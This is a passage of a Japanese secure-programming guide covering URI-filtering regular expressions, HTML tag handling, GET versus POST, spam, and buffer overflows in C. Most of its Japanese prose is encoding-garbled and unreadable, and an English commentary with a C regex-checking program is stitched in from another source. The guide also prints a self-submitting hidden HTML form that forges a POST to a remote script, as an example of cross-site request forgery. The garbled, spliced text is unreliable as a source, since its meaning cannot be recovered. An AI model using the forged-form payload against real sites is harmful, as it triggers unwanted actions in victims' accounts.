    BNł|Xgł URI ł́AقƂǂ̋@\͕Kvł͂܂
    B܂[UANZXA[UC
    肷̂[UɕĂ炤߂ɁA̋@\𗘗pĂƂ
    ܂B̂悤 URI ł́AZ}eBbNU(semantic
    attack)\ɂȂ܂Bڂ́ASection 6.16 ĉBpX
    [h̃[U͂댯łBuEU͂ĂApX[
    hLbV邩łBʏ́A|[gwׂ͂ł͂܂
    BŔA|[gقȂ΁AvgRقȂ邱Ƃ҂āA
    ʓIɁuvgR̍vōǓ^邩łBƂ΁A
    VXeł́ugophervXL[p\ŁASMTP(dq[) |[
    gw肷邱ƂŁA郆[UɍU҂肽[𑗂点
    ܂BȃP[X(Ƃ http |[g 8008  8080 Ƃ)͔F
    ߂Ă悢܂񂪁AS̓IɌƁA邾̉l͂
    ܂BzXg𖼑OŎw肷ꍇɁAȂ蕶Wɐ
    ܂(DNS ̎dlg)BZpIɌƁAdlł̓A_[XRA(u
    _v)F߂Ă܂񂪁AMicrosoft ͂̎dl̕𖳎Ă邾
    łȂAł̓A_[XRA̎gpKvƂĂ܂B
    Ă炭F߂𓾂ȂP[Xł傤B܂ DNS 
    őT|[gƂɐ͂ł܂Ał͂
    ȏ͘_܂B
   
 E pXFʁApXĖ肠܂񂪁AcOȂpẌꕔ
    NGƂĎgāA󂯂Ă܂AvP[V܂B
    ɂĂ͎Ř_܂B܂ApXɁu..vƓ̏ݒł
    ܂̂ŁAȎĂ Web T[oł́AvCx[gȃf
    [^炵˂܂B́AȑOقǖł͂ȂȂĂ̂
    AWeb T[ołƏCĂBu..vƂ͓
    ʂŁApX(ł΃NG)āAu../vݒłȂ悤ɂĂ
    BA؂dg݂ URL GXP[vĂƁA
    ͓Ȃł傤BŕKvɂȂ̂́A̕GXP
    [vĂo[WAA̕ɑ΂邳܂܂
    usvGR[h܂悤ɂȂ΂ȂȂƂłB
   
 E NGFNG̃tH[}bg(u?vł͂܂)ZLeB̃X
    NɂȂ邩܂BƂ̂ANG̃tH[}bgɂ́A
    ̓NCAgœN̂邩łBĂ͂
    ȂAȂ̃AvP[VlłB̌ɂĂ 
    Section 4.11 ɏڂ񂪂܂BdȖƂāA
    Kv܂BāAWeb TCg̑́Aɂ́u_
    CNg񋟂ꏊvłB_CNgɂ́A[U
    ׂƂłp^擾A[UɐVꏊփ_C
    NgR}h𑗂Ԃ܂BU҂̂悤ȃTCgQl
    āAɊ댯 URI Ƀ_CNgl񋟂A̒lŃuE
    UyɃ_CNgĂ܂ƁA͖ɂȂ܂BJԂ
    ɂȂ܂AuEUɂ͂ƒӂ𕥂ĂBA\
    Ȓӂ[UׂĕĂ킯ł͂܂B܂AWeb Av
    P[Vɂ͐ƎコꍇANGlōU󂯂
    ܂\܂Bĥ͍łB URI 
    Kił́Au+v(vX)F߂Ă܂񂪁Aɂ́u+v
    Xy[X\킷̂ɂ悭gĂ܂B
   
 E tOgFtOg͂hLg̈ꕔłB@
    Ȃ΁AtOgɑ΂U͂ȂƎvĂ܂A
    ̕@̐̂`FbNKv܂BłU҂́A
    dp(")̂悤ȕꂽAr[ URI I点
    ł邩܂(`FbN̗)B
   
 E URL GXP[vF URL GXP[v͕֗łBƂ̂́Aǂ 8 r
    bg\ł邩łBɂƂĂ댯łA
    ͖󂪂܂BɁAURL GXP[v͐䕶\łAo̗
    Ȃ Web AvP[V̑̕\ɑ΂ĖhłB
    ɂ URL GXP[v낤Ȃ낤AWeb AvP[V͂
    ɑ΂Ėhł(obNXbVApTh)B
    ͂ʉ̂łB
   
 E  URIF URI ͂ȂSȂ͂ł(Web TCg܂^c
    Ă)AAvP[VŁA URI Ȃ悢
    ̂܂B
   
APƂ̃g[hIt܂BPȃp^͗₷
̂łAmƂ͌܂(Pł邪䂦ɂ܂ɊÂA܂
ɂ̂ǂ炩łBꂪmȃp^łƂĂ)BGȃp
^͂萳mɂȂ蓾܂AɃG[NA萫\Kv
ƂȂ肷鋰ꂪ܂B܂ɂẮAŝȏ
肦܂B

ł͎̈ĂƂāAuPقƂǈSȁvURI p^Љ܂
B́uƁvŎsłPŁAK\gĂ\łB
Lp^łB

(http|ftp|https)://[-A-Za-z0-9._/]+                                    

̃p^͐ݓIɊ댯ƂȂ\̂悤ȃNGtOgA
|[gA URI F߂A킸ȃXL[Ă܂B
́u%v̎gphƂŁAURL GXP[vAT[o܂
ȂȂł悤ɂȂ܂B܂u:v URL G
XP[vĂȂ̂ŁA|[gw肷̂F߂Ă܂A
댯 URI ւ̃_CNgɂȂ܂(GXP[vĂ
)B܂̗̑̕ph܂BJԂ܂Ao̗ǂ
Ȃ Web AvP[V́u\zÓv܂܂B
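
The "simplest mostly safe" pattern above as an executable check, added here as an example that is not part of the original document. It uses POSIX regcomp(3) in extended mode; the function names and sample URIs are mine, and the one deliberate difference from the bare pattern is that it is anchored with ^ and $, because an unanchored regexec() accepts any string that merely contains a matching substring.

```c
#include <regex.h>
#include <stdio.h>

/* The page's pattern, anchored so the whole value must match. */
static const char SIMPLE_URI_ANCHORED[]   = "^(http|ftp|https)://[-A-Za-z0-9._/]+$";
/* The same pattern without anchors, kept only to show the mistake. */
static const char SIMPLE_URI_UNANCHORED[] = "(http|ftp|https)://[-A-Za-z0-9._/]+";

/* Returns 1 if uri matches pattern as a POSIX extended regex, 0 if it does
 * not, and -1 if the pattern itself fails to compile. */
static int matches(const char *pattern, const char *uri)
{
    regex_t re;
    if (regcomp(&re, pattern, REG_EXTENDED | REG_NOSUB) != 0)
        return -1;
    int rc = regexec(&re, uri, 0, NULL, 0);
    regfree(&re);
    return rc == 0 ? 1 : 0;
}

/* The check as it should be used: the entire value must be an http, https
 * or ftp URI made only of letters, digits, '-', '.', '_' and '/'.  Queries,
 * ports, fragments, URL escapes and other schemes therefore fail. */
int uri_is_simple_safe(const char *uri)
{
    return matches(SIMPLE_URI_ANCHORED, uri);
}

/* Unanchored version: reports 1 for "mailto:x http://host/" because a
 * matching substring exists, which is not what a filter wants. */
int uri_contains_simple_uri(const char *uri)
{
    return matches(SIMPLE_URI_UNANCHORED, uri);
}

int main(void)
{
    const char *samples[] = {                   /* constructed sample values */
        "http://www.dwheeler.com/secure-programs/",
        "http://www.dwheeler.com/?q=1",         /* query: rejected */
        "http://www.dwheeler.com:8080/",        /* port: rejected */
        "mailto:someone http://www.dwheeler.com/", /* only a substring matches */
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-45s anchored=%d unanchored=%d\n", samples[i],
               uri_is_simple_safe(samples[i]), uri_contains_simple_uri(samples[i]));
    return 0;
}
```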

́uقƂǈSȁvURI łA^킵 URI 낢ƋĂ
܂B^킵̂Ƃ́ATufBNg(u/v𗘗p)ʃfB
Ngւ̈ړ (u..v𗘗p)݂悤Ȃ̂łB̎̕s
NǴAT[omׂłBsȃzXg ID(Ƃ΁u20.20v)
Ă܂܂AꂪZLeB̎_ƂȂP[X͒m
܂B Web AvP[Vɂ́ATufBNgNG̃f[^
(ƂЂǂ̂ƁAR}h̃f[^)ƂĈ̂܂B
ĥ͈ʓIɍłBƂ̂AueȐ݌v Web AvP[
Vׂāv錩݂͊FłBpX̎gp͉
\łAĂ܂ƃC^[lbg̏قƂǎQƂłȂ
ȂĂ܂܂B܂̃p^ł́A[JȃT[ȍ(uhttp:/
//vuhttp://localhost/vAuhttp://127.0.0.1vg)͎QƉ\
A}V̓lbg[NgăT[oɃANZXĂ܂Bł
T[oAHTTP  GET ߂̌ʂ𓮂߂ł͂ȂAPɏ
擾AƂ߂ƂOɗȂ΂Ȃ܂B 
Section 4.11 ł̓_𐄏Ă܂B̃p^ł̓NG̏F
Ă܂̂ŁAقƂǂ̊ł͂ŏ\Ȃ͂łB

cOȂAuقƂǈSȁvp^A܂ƂŖɗ URI h
ł܂܂BƂ΁AWeb TCg̑́Au?ṽhL
gʂ̂ɎgpĂ܂(Ƃ news TCgł̋L)Bu#v
̓hLg̓̃ZNV肷̂ɖɗ܂A
URI 邱ƂŁAc_ՂȂ܂B܂܂ȋꂽ
 URL GXP[v́uقƂǈSȁvp^ɂ͊܂܂Ă܂BƂ
΁AURL GXP[vȂƁApȊÕy[WɃANZX͍̂
ɂȂ܂B{ɂ̂悤ȋ@\KvȂA@\オقǃ[U
XNƂƂFŁASႢp^gĂ
܂܂B

NG͋邪AvgR|[gɐp^͉L̒ʂ
łB͂uPłSȃp^vƌĂԂƂɂ܂B

 (http|ftp|https)://[-A-Za-z0-9._]+(\/([A-Za-z0-9\-\_\.\!\~\*\'\(\)\%\?]+))*/?

̃p^͐Ă킯ł͂܂BsȃGXP[v╡
NGA ftp ł̃NGF߂Ă邩łBrIPƂ
͎Ă܂B

ɂ́AuSȁvp^̍쐬āAl URI 𐧌
͔̂ɓƂłBł́A󎄂Ăp^łu
̍񂾂Sȃp^vڂĂ݂܂B󔒂͖āARǵu#
vŕ\Ă܂B

 (                                                                              
 (                                                                              
  # Handle http, https, and relative URIs:                                      
  ((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|     
    ([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?                
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path     
   (\?(                                                              # query:   
       (([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=           
        ([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+            
        (\&([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=        
         ([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*)        
       |                                                                        
       (([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+  # isindex 
       )                                                                        
   ))?                                                                          
   (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment 
  )|                                                                            
 # Handle ftp:                                                                  
 (ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)            
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path     
  (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment  
  )                                                                             
 )                                                                              

 

L̎̍񂾃p^łAs URI ׂĂ֎~킯ł͂܂
BƂ΁AJԂɂȂ܂u20.20v͕sȃhCłAp
^ʉ߂Ă܂܂B̒mƂł́AɂăZL
eB̖͔܂B̍񂾃p^͐䕶(Ƃ %00
 %FF ͈̔)\ URL GXP[v֎~Ă܂BĂŏ
̃GXP[vĺA%20(ASCII ̋) łB䕶֎~邱ƂŁAg
u͂h܂A܂BׂẮu2-9vu0-9v
ύX邱ƂŁA䕶Cӂ Web AvP[Vɑ悤ɂȂ
܂B̃p^̓pXɂāAȊOׂĂ URL GXP[v
Ă܂Bۉɂ͕֗łAۉȂVXeł͖
N܂B̃p^͏ȂƂ URI ̒ŁA󔒂sAdp
ȂȂh܂BɂāA URI 쐬ς݂̃hL
gɑgݍ񂾎ɂ̑̎ނ̍Uh܂B̃p^͂
Łu+vĂ_ɒӂĂBŔAvXɂ
󔒕̑ƂāANGtOgŎgĂ邩łB

Lŏqׂ悤ɁAcOȂƂɃNGf[^ƁÃeNjb
NgUA܂NGĂ܂ƁAɖh䂪ق
łȂ悤Ɏv܂BŁAL̃p^NGf[^@
\Ă܂ƂA낤ƎvΉ\łBςāu̍
񂾂Sȃp^v쐬Ă݂܂B

 (                                                                              
 (                                                                              
  # Handle http, https, and relative URIs:                                      
  ((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|     
    ([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?                
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path     
   (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment 
  )|                                                                            
 # Handle ftp:                                                                  
 (ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)            
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path     
  (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment  
  )                                                                             
 )                                                                              

邱Ƃ́Ãp^[UInCp[eLXg̃A
J[ (u<a>v^O)`FbNĂA̕@ŁuWeb ̃oOv
̍h܂B Web oO͒PȃeLXgŁACy[Ŵ匳
Web T[oł͂ȂO҂AÑRecǂ񂾂AƂ
ȏǐՂł悤ɂ܂Bڂ́A Section 7.7 Ă
B悤ȃ`FbN[ <img>(摜)^OɎgĂȂA
͓Ă͂܂܂B摜^O͑Ƀ[hANuWeb oOv
ł܂Bǂ悤łAł͂ǂȑĂȂAƂ
ƂOɂĂ܂B댯ȑ͂ƂĂA񋟂悤
ĂZLeBɌĂ܂܂B

炷ׂẴp^́AURI ̃p^ɊSɃ}b`Ă邱Ƃ
ɂȂĂ邱ƂǂYȂłB̃p^ŕsȂƂ
́AʁAe\ȃp^ɂĂ܂A֗ȃp^̑
ւĂ܂Ƃł(ƂΐV URI XL[̗pW܂)B
܂AWeb TCg̒ɂ 1 ̃NG\킷̂ɁAɑ̃NG
sƂAĥ͌ƂĂƂĂłB
ɂ̂悤 Web TCgɂ́AS̍\ɑgݍ܂Ă܂Ă̂
܂BʂƂāAWeb TCg GET NG 1 ̓Ƃ
󂯎́A URI ͖{ɈSƂ͌܂(Section 4.11 Q)B
 URL  URI ɂĂɏ񂪒m肽΁AIETF RFC 2396 
BhC̏ɂẮAIETF RFC 1034 ŏڂ_Ă
B

 

4.10.5. ̑ HTML ^O

 HTML ^OT|[gɂ͂ǂAƍlĂsvc͂
Bɑł͂͂肵Ă܂B̓Xg`̃^OŁA <ol>
(ordered list) <ul> (unordered list)A<li> (list item)̑Ώۂɂ
܂BƂ܂ŗĂ܂ƁAۂׂĂ̋@\Ă
邱ƂɂȂ܂ (̏ꍇA񋟎҂M邩AŐe
`FbNKv܂)BdvȂ̂́AǉV
@\͂ǂAG[(͍U₷Ƃ)ɂȂƂƂ
_łB

ƂāA悤 URI p^ <img>(摜)^Oꍇ
B邱ƂŁA炩ɈS܂BŔAuWeb oOv
}O҂ɋĂ܂łBWeb oOŁANA̃hL
gǂ񂾂̂ł܂B Web oOڂm肽 Section
7.7 ĂB

 

4.10.6. ֘A

Web AvP[V͕W(ʂ ISO-8859-1)w肵Ȃ΂
BMłȂ[Uf[^̕gĂĂAĂ͂
܂B Section 8.5 ɂɏڂ񂪂܂B

̎̓͂tB^ƁAԈႢN₷̂ŁA̎il
ɘ_Ă܂BI 1 ́Aʂ̌g悤Ƀ[U֊mF
Ƃ̂ŁA HTML ȒPɐ݌vł܂BfUC
HTML PɂȂ܂B܂̌ɑ΂ċ@\ɐ܂
B 1 ̉@́AHTML ͂āAuSȁv`ɕϊA
̈SȌ` HTML ɉ߂@܂B

tB^O͓͎Ao͎A̗͂Ŏ{ł܂B CERT
Ă@́Af[^o͂̉ߒA܂蓮Iȃy[ẄꕔƂ
Ă܂Ƀ_OOł̃tB^łB{ł΁A
ŊmɓIȃRecׂătB^ł܂B CERT ́A
ł̃tB^O͂܂ʂłȂAƍlĂ܂BŔAI
ȃRec HTTP Ƃił͂ȂA Web TCg\f[^x[
ẌꕔɂȂĂ邩łBĂ̏ꍇAWeb T[o͓͏ߒ
ɂẴf[^܂BtB^OAIȃf[^
邠ꏊŎsȂAf[^̒g͉ꂽ܂܂ɂȂ
Ăł傤B

A͂̓_Ɋւ CERT ɓӂ˂܂B͂ƓlAo͂
Ăɑ΂āAtB^YĂ܂_ɖ肪܂B܂
uꂽvf[^̃VXeւ̐NƁAǂŖƂN
̂҂HڂɂȂ܂BSȃvÓAׂ͂ĂtB^
΂܂B̃`FbN̓tB^̈ꕔɓǂ
ꍇ邩ł(΁Aei[Ã[͖{ɂȂ
Ă̂mFł悤ɂȂ܂)BāASKvƂȂvO
ɂ́AvÔŏo͂sӏ̂́Af[^v
Oɓ͂@ꏊ͂ق̐ɂȂĂꍇ܂B
̂悤ȃP[Xł́A͂ŃtB^O@͗Dꂽ@ɂȂ
傤B

 

4.11. NGȊO̎s HTTP  GET ߂g킹Ȃ

HTTP 𗘗p Web x[X̃AvP[Vł́ANGȊO̖ړI
HTTP ́uGETv́uHEADv߂gȂ悤ɂĂB HTTP
ɂ͂܂܂Ȗ߂񂠂܂BłʂɎg閽߂́A GET 
POST  2 łB GET  POST tH[f[^𑗐Mł܂A
GET ߂ URL Ƀf[^đM܂B̈APOST ߂ URL 
͕ʂɃf[^𑗐M܂B

GET NGȊO̖(f[^̕ύX₨̐U荞݁AT[rXɃTC
Abv悤)ɗpƔĂ܂ZLeB̖́AU
҂ӂtH[f[^݂ URL ɑ΂ănCp[eLXg
N𒣂Ƃɂ܂BU҂]҂UāÃNN
bN(nCp[eLXgN̏ꍇ)Ay[W肵
(HTML ̉摜^O摜Ƃď񂪓`Ăꍇ)AGET s
B GET sƁA]҂́AU҂쐬tH[f[^ׂ
̃NւƑ܂B̃TCgɂ܂ӂRec
UɂẮA Section 6.15 Ř_܂B

TCgɂ܂ӂRecɂUAvȂf[^
[UɌ邾ł΁Aقǖ͐[ł͂܂B
͂ŖȂ̂łAɂ̋@\gÛ
̂łBƂ΁A[U\ɉv܂ƂŁAvCoV
[o\łĂ܂BȂƁA@͈@ɂȂ悤
Ȏv悤Ɍ邱ƂŁAɖƂȂA[Uɉ
̕@ŏvāA{͌JȂU҂֌J
肷邩܂BƉe[Ȃ̂́AӂU҂
f[^邾łȂATCg܂NɂāAf[^
₂sׂłB

ʓI HTTP ̃C^tF[X(Ă CGI Cu)́AGET  POST
̈Ⴂ킩ȂĂ܂̂ŁAf[^擾Ƃ_炷Ƒo̖
߂u̕@vƂĈ֗łBAf[^NGȊỎ
̏ۂɍsȂAv POST ȊOɉ̂ă`FbN
Kv܂BȂA^ꂽf[^tH[ɓĂ
\A[U{ɂ̗vȂ̂AmFĂB
邱ƂŁATCg܂ӂRecɑ΂Uh
܂B[Uɂ́AȒPɃNbNŊmFł悤ɂȂ
Ȃ܂B

ہAHTTP ̎dlł͂̍sׂĂ܂B HTTP 1.1 ̎dl
(IETF RFC 2616 ZNV 9.1.1)ɂƁAuGET  HEAD ߂ȊO
œuӖ͂Ȃ͂vłB̖߂́uSvł͂łB
̓[UG[WFgɑ΂āAʂȕ@ł̖̑߂ł POST
 PUTA DELETE ̑܂B̌ʁASłȂȂ
vĂAƂ[UmƂƂȂ܂vB

܂Ał͖Sɂ͉łȂ_ɒӂĂ
BȂȂAuEU(̐ݒ̒)ɂ̓XNvgꂽ POST œ
ȓ삪ł̂邩łBƂ΁AECMAscript(Javascript)
\ Web uEUL HTML ̒fЂ󂯎Ɖ肵܂B
uEÚA HTML ̒fЂ\邾ŁAU҂`tH[
f[^IɃ[UōU҂I Web TCgɑ΂ POST
߂𑗂Ă܂܂B

  <form action=http://remote/script.cgi method=post name=b>            
    <input type=hidden name=action value="do something">               
    <input type=submit>                                                
  </form>                                                              
  <script>document.b.submit()</script>                                 

̓_wEĂꂽ David deVitry ɂ͊ӂĂ܂B̃A
hoCXł肷ׂĂ͉ł܂B邾̉l͂܂
Bc̖͂xA茫uEU(Ƃ΁AECMAscript 
Web tH[𑗂Oɂ͏ɂ̃f[^mF) Web uEU̐ݒ
(Ƃ΁A ECMAscript 𖳌ɂ)ŉł܂B܂A̍U̓N
XTCgEXNveBOȖł͋@\܂BŔAWeb T
Cg̑́A[UuscriptvR}h POST łȂ悤ɂĂ
AURL NRɒ悤ɂĂ邩łB܂AGET R}
h̓𐧌ƁANGɑ΂ Web AvP[ṼZLe
BP܂B

 

4.12. SPAM ɑ΍R

ǂɓdq[𑗂vOȂAlbg[N̗v SPAM
̉^щɂȂ܂B SPAM Ƃt͒ʏ̂ŁAɂ unsolicited bulk
email(UBE)́Amass unsolicited email ƌ܂B unsolicited
commercial email(UCE)Ƃ܂A͌𐶂݂܂BSPAM ׂ
pł͂ȂłB SPAM Ȃ[ȖƂȂĂ̂́A
QƂĂB http://mail-abuse.org/, http://spam.abuse.net/, 
CAUCE <http://www.cauce.org/>, and IETF RFC 2635 <http://
www.faqs.org/rfcs/rfc2635.html> SPAM 󂯎蒆p肷lA
SPAM ɂRXg̑啔𕉒SĂāASPAM 𑗂l͑̂ɂق
ǃRXgĂ܂BāASPAM T[rXD_Ƃ݂Ȃ
l唼ŁAhȍsׂƂ͎vĂ܂B

vOɑdq[쐬悤Ȃ(MTA dq[Ńf[
^𑗂́A[OXgǗ)AvO΂ɕsȓd
q[̒pȂ悤ɍ쐬ĂBvO͕ʁAK
F߂ꂽ[U҂ɓdq[𑗂悤ɂĂ(Ƃ
΁AƂ̃[T[o֓o^AɃT[rXɉ)B
ڂ́A IETF RFC 2505 <http://www.faqs.org/rfcs/rfc2505.html> 
܂B܂A[OXg^pĂȂAo^҂e
\Ƃ[K{ĂB܂uOCv@\t邱
ƂŁASPAM 𑗂lAo^ESPAMoEEނ̂ɁAȂ
܂B

SPAM ɑ΂蒼ړIȑ΍R 1 ɁAMAPS (Mail Abuse Prevention
System LLC) RBL (Realtime Blackhole List)ɉ@܂B
́ASPAM ̏oƂĒmĂ IP AhẌꗗ𐏎XVĂ
Bɏڂ http://mail-abuse.org/rbl/ ĂBŋ
 Mail Transfer Agent(MTA)̑́A RBL T|[gĂ܂B
̂悤ɐݒ肷邩́Aꂼ Web TCgĂBʏ RBL 
pƁAubNz[EXgɍڂĂ IP AhX̂
vPɋۂ܂B͌łA܂B
ɂlȋ@\񋟂T[rXƎv܂B

VXevOœdq[𑼂̏ɔzłȂ̋ʂ
胆[ŮǗɂꍇAVXevȎł̓ftHg
SPAM ̃ubNLɂ悤E߂܂B MTA ΏۂɂȂ܂B
͂ƂꌟĂB񂱂̒ẮAIɂ͖肪
B͐K̃[UƂ̂肪(܂)ւ邩Ȃ_
BASPAM ubNȂ΁AׂĂ̐lȂ̃VXeu
bNXgɍڂ鋰ꂪ܂(܂肠Ȃ̓dq[͖
)B̖͒Pł͂܂BȂ悤ƂAdq[
󂯎ȂloĂ邩łB RBL ǗĂgDǂ
M邩AƂ܂BƂ΁A{͌ȃTCgu
bNXgɒǉꂽƂ܂BčƂƂŁȂgD
Xg폜܂BȂ͂ OK ł傤B܂Ag
[hItȂ̂łB؂Ȃ̂́ASPAM 𑗂Ăl(Ȑl炩
܂) SPAM ubNĂ鑼̃VXe(SPAM 𑗂ĂlƓ
gĂ閳ȐlrĂ܂)Ƌ邱Ƃł͂Ȃł傤
B_ɑΉȂ΂Ȃ͎̂łBc_̗]n̂ĂȂ̂
AF񂪒uĂ闧lĂ݂ĂB

 

4.13. ͎Ԃƕ׃xɐ

^CAEg݂A׃xɐĂBlbg[N
Ăf[^ɂ͓ɂłBȂƁAU҂͌păT[
rXvāAT[rXۍUȒPɎsłĂ܂܂
B

 

Chapter 5. obt@I[o[t[̉

                                    G̒n͂݁AO̍Ԃ|A 
                                    s𗪒DB                   
                                                                       
                                            񐹏AX 3  11 

pɂɔĂZLeB̎_́Auobt@I[o[t[v
΂Ǝ㐫łBobt@I[o[t[́uobt@I[o[vƂ
A܂܂ȃobt@I[o[t[U݂Ă܂(uX^bN
̈jvuq[v̈jvł)BɌ΁Aobt@I[o
[t[̓vO̖̎łA܂ɕpɂɔAd
ȖĂ̂ŁAēƗčڂ𗧂Ă܂B̖肪
ɏdvȂ̂́ACERT ̊̓ 1998 N 13 ̓ 9A1999 N̏
Ƃȏオobt@I[o[t[֘Ał邱ƂŖ炩łB
Bugtraq ɂ 1999 N̔ȒłA悻 2/3 ̉񓚂obt@
I[o[t[ZLeB̐Ǝコ̌ƂĂ܂(c̉񓚂́u
~XvƂĂ܂) [Cowan 1999]B͈ȑO炠m̖
łAɊxƂȂł [McGraw 2000]By󒐁FBugtraq
́AZLeB֘Ȁ肷 ML łB ML ̃A[JCu
<http://www.securityfocus.com/archive/1> JĂ܂B{ł
ML ݂Ă܂Bڂ́A BUGTRAQ-JP FAQ <http://
www.securityfocus.com/popups/forums/bugtraq-jp/faq.shtml#0.1.1> 
z

obt@I[o[t[́Al()Œ蒷̃obt@̈ɂ
̈zďĂ܂ꍇɔ܂Bobt@I[o[t[
A[U̓͂obt@ɓǂݍގɂN܂AvO
܂̍ŒɂN\܂B

S߂vOŃobt@I[o[t[NƁAU
pP[X悭܂Bobt@ C ̃[JϐŎ
ĂꍇAU҂͂̃I[o[t[̊֐Ŗ]݂̃R[h
IɎsiƂėp܂B̍ŨoG[V́uX
^bNj(stack smashing)vUƌĂԏꍇ܂܂܂Bobt@q
[v̈ɂĂA󋵂ǂȂ킯ł͂܂BU҂́AI[o
[t[gāAvO̕ϐRg[ł܂Bɏڍ
ȏ́AAleph1 [1996] Mudge [1995]ALSD [2001]Qlɂ邩A
Nathan P. Smith ̃TCg http://destroy.net/machines/security/ ɂ
uStack Smashing Security VulnerabilitiesvĂBy󒐁Fq[
v̈́AvOŗpf[^i[̈ŁApɓIɊ
蓖ĂApςނƉꂽAėpɉ񂳂܂B C ł
malloc(3) Ŋmۂꂽ̈悪ɓ܂z

̑啔́Aɉe܂BŔA
Iɔz̑傫ύX(Ƃ Perl)Aobt@I[o[t[
mĖh䂷悤ɂȂĂ(Ƃ΁AAda95)邩łB
AC ͂̂悤Ȗɑ΂āAhi킹Ă܂񂵁A
C++ ł̖𔭐̂͑܂BAZuł
h䂷@܂Bɂ͂̂悤ȖhĂ(
΁AAda  Pascal)܂Aʏ͖ɂȂĂ܂(\̗R
ł)BƂvȎ啔𑼂̌ŏĂĂACu[
`̑Ƃ̃Cu[`ĂяoC^tF[XR[h C 
C++ ŏĂ܂BāǍꂪҒʂɃobt@I[o[
t[SɖhƂ͌܂B

 

5.1. C  C++ ̊댯ȂƂ

C [ÚAmۂĂ̈z邱Ƃ͂肦ȂƊm؂łȂ
΁AE`FbNȂ댯Ȋ֐gׂł͂܂Bʏgp
ǂ(mɖh䂷ׂ)֐ɂ́Astrcpy(3) strcat(3)A
sprintf(3)(eʂɓ vsprintf(3))Agets(3) ܂B̑
āAstrncpy(3)Astrncat(3)Asnprintf(3) fgets(3)̎gpE߂
܂Bڂ͉LŘ_܂̂œǂłB strlen(3) NIL K
݂̂młȂ΁AgpĂB scanf()n (scanf(3)
 fscanf(3)Asscanf(3)Avscanf(3)Avsscanf(3)Avfscanf(3)) ́Agp
̂Ɋ댯ȏꍇX܂BŒlcɃf[^𕶎ɓn
Ȃł(Ƃ킯 %s Ƃ`͖ɂȂ܂)Bobt@I[o
[Ă܂Ȃ̊댯Ȋ֐Ƃ(̎gɂ܂
)Arealpath(3) getopt(3)Agetpass(3)Astreadd(3)Astrecpy(3)A
strtrns(3)܂B getwd(3)ɂ͒ӂȂƂ܂Bgetwd(3)ɑ
obt@́A PATH_MAX oCg܂B

snprintf()n͎cOȂƖĂ܂B sprintf() ƈ
snprintf()́Aɂ ISO 1990(ANSI 1989)Ki̕W C ֐ł͂܂
BāAVXeׂĂ snprintf() 킯ł͂܂B
ɍƂɁAVXe snprintf()́Aobt@I[o[t[
h܂B sprintf ĂяołB Linux  libc4 Ƃ
Âo[ẂAulibbsdvCuɈˑĂ܂Bꂪ
炵CułBÂ HP ̃VXeɂlȂ̂܂
B Linux ̍ŋ߂ snprintf ͐삷邱Ƃ킩ĂāAv
ElɎĂ܂B snprintf() ̕Ԃl܂܂łB
Single Unix Specification (SUS) version 2  C99 Kił́AԂ邩
Ă܂BʓIɂ킩̂́Asnprintf ̃o[Wɂ͕ NIL
ŏI[̂ۏ؂Ȃ̂AƂłB񂪒
ANIL ܂Ȃł傤B glib Cu(GTK ̃x[XɂȂĂ
̂ŁAGNU C Cu glib Ƃ͈Ⴂ܂)ɂ g_snprintf() 
BԂlтĂA NIL ŏI[܂BƏdvȂ̂́Aob
t@̒ɎĂ_łBy󒐁FC99 KíAuISO/IEC 9899:
1999 - Programming Language Cvw܂Bڂ http://
seclan.dll.jp/c99d/ QƂĂz

 

5.2. C  C++ ł̃Cuɂ

C/C++ ɂƂāAobt@I[o[t[̖ĂȂ
֐Cu̗p܂B͂߂̃TuZNVł́AuW C 
Cuvg@܂Bʂ͂܂A_
B̃TuZNVł́Aobt@I[o[t[ɑ΂āAŒ蒷Ɠ
IɍĊmۂ闼@ŃZLeB悭܂B
TuZNVł́Astrlcpy  libmib ƂȂ܂܂ȃCu
ɂĐ܂B

 

5.2.1. W C Cuɂ

C Ńobt@I[o[t[hu퓅vi(C++ łgĂ܂)
Aobt@I[o[t[hłW C CuĂяoƂł
B̉@́AW֐ł strncpy(3) strncat(3)łǂɂ
Ȃ܂B̉Ƃɂ͒ӂKvłBgӊOƖʓ|ŁA
̂łB strncpy(3)̓Rs[̕񂪃Rs[
̒ȂARs[̏̕I[ NIL Zbg܂B
Astrncpy(3)ďoɁARs[̏I[ NIL KZbg悤
ĂBobt@g񂵂ȂAstrncpy()g
